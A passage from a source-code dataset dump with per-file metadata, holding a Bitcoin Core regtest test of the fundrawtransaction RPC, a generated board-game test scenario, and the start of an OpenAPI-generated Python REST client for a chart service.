    print("\t%s: %r" % (param_name, best_parameters[param_name]))

# # Get best model
# best_model = model.best_estimator_
#
# # Fit model with best parameters optimized for quadratic_weighted_kappa
# best_model.fit(s_data, s_labels)
# preds = best_model.predict(t_data)
82c9e48a497356262b95f37312dffff6546221d1 | 24,507 | py | Python | qa/rpc-tests/fundrawtransaction.py | Kangmo/bitcoin | a9149688f87cb790a600400abd9af72c3ee0c312 | [
"MIT"
] | null | null | null | qa/rpc-tests/fundrawtransaction.py | Kangmo/bitcoin | a9149688f87cb790a600400abd9af72c3ee0c312 | [
"MIT"
] | null | null | null | qa/rpc-tests/fundrawtransaction.py | Kangmo/bitcoin | a9149688f87cb790a600400abd9af72c3ee0c312 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(BitcoinTestFramework):
def setup_chain(self):
    """Create a clean (no pre-mined blocks) data directory for 4 nodes."""
    print("Initializing test directory %s" % self.options.tmpdir)
    initialize_chain_clean(self.options.tmpdir, 4)
def setup_network(self, split=False):
    """Start 4 nodes and connect them into a single (unsplit) network."""
    self.nodes = start_nodes(4, self.options.tmpdir)
    # Bidirectional links forming one connected component.
    for a, b in ((0, 1), (1, 2), (0, 2), (0, 3)):
        connect_nodes_bi(self.nodes, a, b)
    self.is_network_split = False
    self.sync_all()
def run_test(self):
    """Exercise the fundrawtransaction RPC end to end.

    Covers: funding with zero or preset inputs, change-output handling,
    fee comparison against sendtoaddress/sendmany, multisig destinations,
    spending from an encrypted (locked) wallet, many-input funding,
    OP_RETURN-only transactions, and watch-only funding on node 3.
    """
    print "Mining blocks..."

    min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee']
    # This test is not meant to test fee estimation and we'd like
    # to be sure all txs are sent at a consistent desired feerate
    for node in self.nodes:
        node.settxfee(min_relay_tx_fee)

    # if the fee's positive delta is higher than this value tests will fail,
    # neg. delta always fail the tests.
    # The size of the signature of every input may be at most 2 bytes larger
    # than a minimum sized signature.

    #            = 2 bytes * minRelayTxFeePerByte
    feeTolerance = 2 * min_relay_tx_fee/1000

    self.nodes[2].generate(1)
    self.sync_all()
    self.nodes[0].generate(121)
    self.sync_all()

    # Node 3 imports only the public key: watch-only balance, no signing.
    watchonly_address = self.nodes[0].getnewaddress()
    watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"]
    watchonly_amount = Decimal(200)
    self.nodes[3].importpubkey(watchonly_pubkey, "", True)
    watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount)
    self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10)

    self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5)
    self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
    self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0)

    self.sync_all()
    self.nodes[0].generate(1)
    self.sync_all()

    ###############
    # simple test #
    ###############
    inputs  = [ ]
    outputs = { self.nodes[0].getnewaddress() : 1.0 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)
    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    assert(len(dec_tx['vin']) > 0) #test if we have enough inputs

    ##############################
    # simple test with two coins #
    ##############################
    inputs  = [ ]
    outputs = { self.nodes[0].getnewaddress() : 2.2 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    assert(len(dec_tx['vin']) > 0) #test if we have enough inputs

    ##############################
    # simple test with two coins #
    ##############################
    inputs  = [ ]
    outputs = { self.nodes[0].getnewaddress() : 2.6 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    assert(len(dec_tx['vin']) > 0)
    # funded-in inputs must still be unsigned
    assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')

    ################################
    # simple test with two outputs #
    ################################
    inputs  = [ ]
    outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    totalOut = 0
    for out in dec_tx['vout']:
        totalOut += out['value']

    assert(len(dec_tx['vin']) > 0)
    assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')

    #########################################################################
    # test a fundrawtransaction with a VIN greater than the required amount #
    #########################################################################
    utx = False
    listunspent = self.nodes[2].listunspent()
    for aUtx in listunspent:
        if aUtx['amount'] == 5.0:
            utx = aUtx
            break

    assert(utx!=False)

    inputs  = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
    outputs = { self.nodes[0].getnewaddress() : 1.0 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)
    assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    totalOut = 0
    for out in dec_tx['vout']:
        totalOut += out['value']

    assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee

    #####################################################################
    # test a fundrawtransaction with which will not get a change output #
    #####################################################################
    utx = False
    listunspent = self.nodes[2].listunspent()
    for aUtx in listunspent:
        if aUtx['amount'] == 5.0:
            utx = aUtx
            break

    assert(utx!=False)

    inputs  = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
    # output consumes the whole input minus fee, so no change is expected
    outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee - feeTolerance }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)
    assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    totalOut = 0
    for out in dec_tx['vout']:
        totalOut += out['value']

    assert_equal(rawtxfund['changepos'], -1)
    assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee

    #########################################################################
    # test a fundrawtransaction with a VIN smaller than the required amount #
    #########################################################################
    utx = False
    listunspent = self.nodes[2].listunspent()
    for aUtx in listunspent:
        if aUtx['amount'] == 1.0:
            utx = aUtx
            break

    assert(utx!=False)

    inputs  = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
    outputs = { self.nodes[0].getnewaddress() : 1.0 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)

    # 4-byte version + 1-byte vin count + 36-byte prevout then script_len
    rawtx = rawtx[:82] + "0100" + rawtx[84:]

    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)
    assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
    assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    totalOut = 0
    matchingOuts = 0
    for i, out in enumerate(dec_tx['vout']):
        totalOut += out['value']
        if out['scriptPubKey']['addresses'][0] in outputs:
            matchingOuts+=1
        else:
            assert_equal(i, rawtxfund['changepos'])

    assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
    assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])

    assert_equal(matchingOuts, 1)
    assert_equal(len(dec_tx['vout']), 2)

    ###########################################
    # test a fundrawtransaction with two VINs #
    ###########################################
    utx = False
    utx2 = False
    listunspent = self.nodes[2].listunspent()
    for aUtx in listunspent:
        if aUtx['amount'] == 1.0:
            utx = aUtx
        if aUtx['amount'] == 5.0:
            utx2 = aUtx

    assert(utx!=False)

    inputs  = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
    outputs = { self.nodes[0].getnewaddress() : 6.0 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)
    assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    totalOut = 0
    matchingOuts = 0
    for out in dec_tx['vout']:
        totalOut += out['value']
        if out['scriptPubKey']['addresses'][0] in outputs:
            matchingOuts+=1

    assert_equal(matchingOuts, 1)
    assert_equal(len(dec_tx['vout']), 2)

    matchingIns = 0
    for vinOut in dec_tx['vin']:
        for vinIn in inputs:
            if vinIn['txid'] == vinOut['txid']:
                matchingIns+=1

    assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params

    #########################################################
    # test a fundrawtransaction with two VINs and two vOUTs #
    #########################################################
    utx = False
    utx2 = False
    listunspent = self.nodes[2].listunspent()
    for aUtx in listunspent:
        if aUtx['amount'] == 1.0:
            utx = aUtx
        if aUtx['amount'] == 5.0:
            utx2 = aUtx

    assert(utx!=False)

    inputs  = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
    outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 }
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)
    assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    fee = rawtxfund['fee']
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
    totalOut = 0
    matchingOuts = 0
    for out in dec_tx['vout']:
        totalOut += out['value']
        if out['scriptPubKey']['addresses'][0] in outputs:
            matchingOuts+=1

    assert_equal(matchingOuts, 2)
    assert_equal(len(dec_tx['vout']), 3)

    ##############################################
    # test a fundrawtransaction with invalid vin #
    ##############################################
    listunspent = self.nodes[2].listunspent()
    inputs  = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin!
    outputs = { self.nodes[0].getnewaddress() : 1.0}
    rawtx   = self.nodes[2].createrawtransaction(inputs, outputs)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)

    try:
        rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
        raise AssertionError("Spent more than available")
    except JSONRPCException as e:
        assert("Insufficient" in e.error['message'])

    ############################################################
    #compare fee of a standard pubkeyhash transaction
    inputs = []
    outputs = {self.nodes[1].getnewaddress():1.1}
    rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[0].fundrawtransaction(rawTx)

    #create same transaction over sendtoaddress
    txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1)
    signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']

    #compare fee
    feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
    assert(feeDelta >= 0 and feeDelta <= feeTolerance)
    ############################################################

    ############################################################
    #compare fee of a standard pubkeyhash transaction with multiple outputs
    inputs = []
    outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3}
    rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[0].fundrawtransaction(rawTx)
    #create same transaction over sendtoaddress
    txId = self.nodes[0].sendmany("", outputs)
    signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']

    #compare fee
    feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
    assert(feeDelta >= 0 and feeDelta <= feeTolerance)
    ############################################################

    ############################################################
    #compare fee of a 2of2 multisig p2sh transaction

    # create 2of2 addr
    addr1 = self.nodes[1].getnewaddress()
    addr2 = self.nodes[1].getnewaddress()

    addr1Obj = self.nodes[1].validateaddress(addr1)
    addr2Obj = self.nodes[1].validateaddress(addr2)

    mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])

    inputs = []
    outputs = {mSigObj:1.1}
    rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[0].fundrawtransaction(rawTx)

    #create same transaction over sendtoaddress
    txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
    signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']

    #compare fee
    feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
    assert(feeDelta >= 0 and feeDelta <= feeTolerance)
    ############################################################

    ############################################################
    #compare fee of a standard pubkeyhash transaction

    # create 4of5 addr
    addr1 = self.nodes[1].getnewaddress()
    addr2 = self.nodes[1].getnewaddress()
    addr3 = self.nodes[1].getnewaddress()
    addr4 = self.nodes[1].getnewaddress()
    addr5 = self.nodes[1].getnewaddress()

    addr1Obj = self.nodes[1].validateaddress(addr1)
    addr2Obj = self.nodes[1].validateaddress(addr2)
    addr3Obj = self.nodes[1].validateaddress(addr3)
    addr4Obj = self.nodes[1].validateaddress(addr4)
    addr5Obj = self.nodes[1].validateaddress(addr5)

    mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']])

    inputs = []
    outputs = {mSigObj:1.1}
    rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[0].fundrawtransaction(rawTx)

    #create same transaction over sendtoaddress
    txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
    signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']

    #compare fee
    feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
    assert(feeDelta >= 0 and feeDelta <= feeTolerance)
    ############################################################

    ############################################################
    # spend a 2of2 multisig transaction over fundraw

    # create 2of2 addr
    addr1 = self.nodes[2].getnewaddress()
    addr2 = self.nodes[2].getnewaddress()

    addr1Obj = self.nodes[2].validateaddress(addr1)
    addr2Obj = self.nodes[2].validateaddress(addr2)

    mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])

    # send 1.2 BTC to msig addr
    txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
    self.sync_all()
    self.nodes[1].generate(1)
    self.sync_all()

    oldBalance = self.nodes[1].getbalance()
    inputs = []
    outputs = {self.nodes[1].getnewaddress():1.1}
    rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[2].fundrawtransaction(rawTx)

    signedTx = self.nodes[2].signrawtransaction(fundedTx['hex'])
    txId = self.nodes[2].sendrawtransaction(signedTx['hex'])
    self.sync_all()
    self.nodes[1].generate(1)
    self.sync_all()

    # make sure funds are received at node1
    assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance())

    ############################################################
    # locked wallet test
    self.nodes[1].encryptwallet("test")
    self.nodes.pop(1)
    stop_nodes(self.nodes)
    wait_bitcoinds()

    self.nodes = start_nodes(4, self.options.tmpdir)
    # This test is not meant to test fee estimation and we'd like
    # to be sure all txs are sent at a consistent desired feerate
    for node in self.nodes:
        node.settxfee(min_relay_tx_fee)

    connect_nodes_bi(self.nodes,0,1)
    connect_nodes_bi(self.nodes,1,2)
    connect_nodes_bi(self.nodes,0,2)
    connect_nodes_bi(self.nodes,0,3)
    self.is_network_split=False
    self.sync_all()

    # drain attempt must fail while the wallet is locked
    try:
        self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.2)
        raise AssertionError("Wallet unlocked without passphrase")
    except JSONRPCException as e:
        assert('walletpassphrase' in e.error['message'])

    oldBalance = self.nodes[0].getbalance()

    inputs = []
    outputs = {self.nodes[0].getnewaddress():1.1}
    rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[1].fundrawtransaction(rawTx)

    #now we need to unlock
    self.nodes[1].walletpassphrase("test", 100)
    signedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
    txId = self.nodes[1].sendrawtransaction(signedTx['hex'])
    self.sync_all()
    self.nodes[1].generate(1)
    self.sync_all()

    # make sure funds are received at node1
    assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance())

    ###############################################
    # multiple (~19) inputs tx test | Compare fee #
    ###############################################

    #empty node1, send some small coins from node0 to node1
    self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
    self.sync_all()
    self.nodes[0].generate(1)
    self.sync_all()

    for i in range(0,20):
        self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
    self.sync_all()
    self.nodes[0].generate(1)
    self.sync_all()

    #fund a tx with ~20 small inputs
    inputs = []
    outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
    rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[1].fundrawtransaction(rawTx)

    #create same transaction over sendtoaddress
    txId = self.nodes[1].sendmany("", outputs)
    signedFee = self.nodes[1].getrawmempool(True)[txId]['fee']

    #compare fee
    feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
    assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs

    #############################################
    # multiple (~19) inputs tx test | sign/send #
    #############################################

    #again, empty node1, send some small coins from node0 to node1
    self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
    self.sync_all()
    self.nodes[0].generate(1)
    self.sync_all()

    for i in range(0,20):
        self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
    self.sync_all()
    self.nodes[0].generate(1)
    self.sync_all()

    #fund a tx with ~20 small inputs
    oldBalance = self.nodes[0].getbalance()

    inputs = []
    outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
    rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
    fundedTx = self.nodes[1].fundrawtransaction(rawTx)
    fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
    txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex'])
    self.sync_all()
    self.nodes[0].generate(1)
    self.sync_all()
    assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward

    #####################################################
    # test fundrawtransaction with OP_RETURN and no vin #
    #####################################################
    rawtx   = "0100000000010000000000000000066a047465737400000000"
    dec_tx  = self.nodes[2].decoderawtransaction(rawtx)

    assert_equal(len(dec_tx['vin']), 0)
    assert_equal(len(dec_tx['vout']), 1)

    rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
    dec_tx  = self.nodes[2].decoderawtransaction(rawtxfund['hex'])

    assert_greater_than(len(dec_tx['vin']), 0) # at least one vin
    assert_equal(len(dec_tx['vout']), 2) # one change output added

    ##################################################
    # test a fundrawtransaction using only watchonly #
    ##################################################
    inputs = []
    outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2}
    rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
    result = self.nodes[3].fundrawtransaction(rawtx, True)
    res_dec = self.nodes[0].decoderawtransaction(result["hex"])
    assert_equal(len(res_dec["vin"]), 1)
    assert_equal(res_dec["vin"][0]["txid"], watchonly_txid)

    assert("fee" in result.keys())
    assert_greater_than(result["changepos"], -1)

    ###############################################################
    # test fundrawtransaction using the entirety of watched funds #
    ###############################################################
    inputs = []
    outputs = {self.nodes[2].getnewaddress() : watchonly_amount}
    rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
    result = self.nodes[3].fundrawtransaction(rawtx, True)
    res_dec = self.nodes[0].decoderawtransaction(result["hex"])
    assert_equal(len(res_dec["vin"]), 2)
    assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid)

    assert_greater_than(result["fee"], 0)
    assert_greater_than(result["changepos"], -1)
    assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10)

    # node3 cannot fully sign (watch-only key); node0 completes the signing
    signedtx = self.nodes[3].signrawtransaction(result["hex"])
    assert(not signedtx["complete"])
    signedtx = self.nodes[0].signrawtransaction(signedtx["hex"])
    assert(signedtx["complete"])
    self.nodes[0].sendrawtransaction(signedtx["hex"])
# Script entry point: run the full fundrawtransaction RPC test scenario.
if __name__ == '__main__':
    RawTransactionsTest().main()
| 40.307566 | 223 | 0.555066 |
766ff54b42078ba645fd047c4f96ec0e618631df | 4,269 | py | Python | z2/part2/interactive/jm/random_normal_1/253914328.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part2/interactive/jm/random_normal_1/253914328.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part2/interactive/jm/random_normal_1/253914328.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 253914328
"""
"""
random actions, total chaos
"""
# Scenario 253914328: a fixed sequence of random gamma-engine actions on an
# 8x4 board with 6 players and a 2-area limit per player.  Every expected
# return code below was captured from a reference run; order matters because
# each call mutates the shared board state.
board = gamma_new(8, 4, 6, 2)
assert board is not None


assert gamma_move(board, 1, 2, 0) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_move(board, 3, 6, 1) == 1
assert gamma_move(board, 3, 7, 1) == 1
assert gamma_move(board, 4, 4, 1) == 1
# (0, 5) is outside the 8x4 board, so the move is rejected
assert gamma_move(board, 5, 0, 5) == 0
assert gamma_move(board, 6, 1, 2) == 1
assert gamma_move(board, 6, 6, 3) == 1
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 2, 0, 0) == 1
assert gamma_free_fields(board, 2) == 4
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 7, 2) == 1
assert gamma_move(board, 5, 3, 3) == 0
assert gamma_busy_fields(board, 5) == 1
assert gamma_free_fields(board, 5) == 22
assert gamma_move(board, 6, 4, 1) == 0
assert gamma_move(board, 1, 2, 3) == 1
assert gamma_busy_fields(board, 1) == 2
assert gamma_move(board, 2, 1, 3) == 1
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 3, 1, 3) == 0
assert gamma_move(board, 4, 1, 3) == 0
assert gamma_move(board, 4, 5, 2) == 1
assert gamma_busy_fields(board, 4) == 2
assert gamma_move(board, 5, 3, 7) == 0
assert gamma_move(board, 5, 6, 3) == 0
assert gamma_move(board, 6, 6, 1) == 0
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 2, 1, 0) == 1
assert gamma_move(board, 2, 4, 3) == 0
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 4, 3, 2) == 0
assert gamma_busy_fields(board, 4) == 2
assert gamma_move(board, 5, 2, 6) == 0
assert gamma_move(board, 6, 1, 5) == 0
assert gamma_busy_fields(board, 6) == 2
assert gamma_move(board, 1, 7, 3) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_busy_fields(board, 1) == 2
assert gamma_move(board, 2, 0, 4) == 0
assert gamma_move(board, 2, 1, 3) == 0
assert gamma_move(board, 3, 5, 1) == 1
assert gamma_move(board, 3, 0, 2) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_move(board, 4, 4, 2) == 1
assert gamma_move(board, 5, 2, 1) == 1
assert gamma_move(board, 5, 5, 2) == 0
assert gamma_move(board, 6, 0, 7) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 1, 3) == 0
assert gamma_move(board, 4, 2, 0) == 0
assert gamma_move(board, 4, 3, 3) == 0
assert gamma_move(board, 5, 0, 7) == 0
assert gamma_move(board, 6, 0, 5) == 0
assert gamma_free_fields(board, 6) == 6
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 3, 5) == 0
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 3, 4, 1) == 0
assert gamma_busy_fields(board, 3) == 4
assert gamma_free_fields(board, 3) == 6
assert gamma_move(board, 5, 2, 0) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_free_fields(board, 1) == 2
assert gamma_move(board, 2, 2, 2) == 0
assert gamma_move(board, 2, 5, 2) == 0
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 5, 0, 7) == 0
assert gamma_move(board, 6, 2, 6) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 4, 0, 5) == 0
assert gamma_move(board, 5, 0, 3) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 1, 0, 6) == 0
assert gamma_free_fields(board, 1) == 2
assert gamma_busy_fields(board, 2) == 4
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 4, 0, 7) == 0
assert gamma_move(board, 4, 7, 1) == 0
assert gamma_move(board, 5, 2, 2) == 1
assert gamma_move(board, 5, 4, 2) == 0
assert gamma_move(board, 6, 0, 7) == 0
assert gamma_move(board, 1, 4, 1) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 7, 0) == 0
assert gamma_move(board, 3, 3, 7) == 0
assert gamma_move(board, 4, 1, 2) == 0


# release the engine's board resources
gamma_delete(board)
| 34.707317 | 44 | 0.650972 |
e35601bef436cf5df222c59d1a06b8defa070c0d | 14,300 | py | Python | code/python/ChartGenerationService/v1/fds/sdk/ChartGenerationService/rest.py | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | 6 | 2022-02-07T16:34:18.000Z | 2022-03-30T08:04:57.000Z | code/python/ChartGenerationService/v1/fds/sdk/ChartGenerationService/rest.py | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | 2 | 2022-02-07T05:25:57.000Z | 2022-03-07T14:18:04.000Z | code/python/ChartGenerationService/v1/fds/sdk/ChartGenerationService/rest.py | factset/enterprise-sdk | 3fd4d1360756c515c9737a0c9a992c7451d7de7e | [
"Apache-2.0"
] | null | null | null | """
Chart Generation Service
This is a service for generating charts in a node environment that were created using web charting and get back images in form of `PNGs` and `JPEGs` as response. # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import io
import json
import logging
import re
import ssl
from urllib.parse import urlencode
from urllib.parse import urlparse
from urllib.request import proxy_bypass_environment
import urllib3
import ipaddress
from fds.sdk.ChartGenerationService.exceptions import ApiException, UnauthorizedException, ForbiddenException, NotFoundException, ServiceException, ApiValueError
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
    """Build the urllib3 pool manager from a client Configuration.

    urllib3.PoolManager will pass all kw parameters to connectionpool
    (see urllib3's poolmanager/connectionpool docs); ``maxsize`` is the
    number of parallel requests allowed per host.  TLS settings
    (CA bundle, client cert/key, hostname assertion) come straight from
    *configuration*.
    """
    # TLS verification policy.
    cert_reqs = ssl.CERT_REQUIRED if configuration.verify_ssl else ssl.CERT_NONE

    # Optional pool tweaks, only forwarded when explicitly configured.
    extra_pool_args = {}
    if configuration.assert_hostname is not None:
        extra_pool_args['assert_hostname'] = configuration.assert_hostname

    if configuration.retries is not None:
        extra_pool_args['retries'] = configuration.retries

    if configuration.socket_options is not None:
        extra_pool_args['socket_options'] = configuration.socket_options

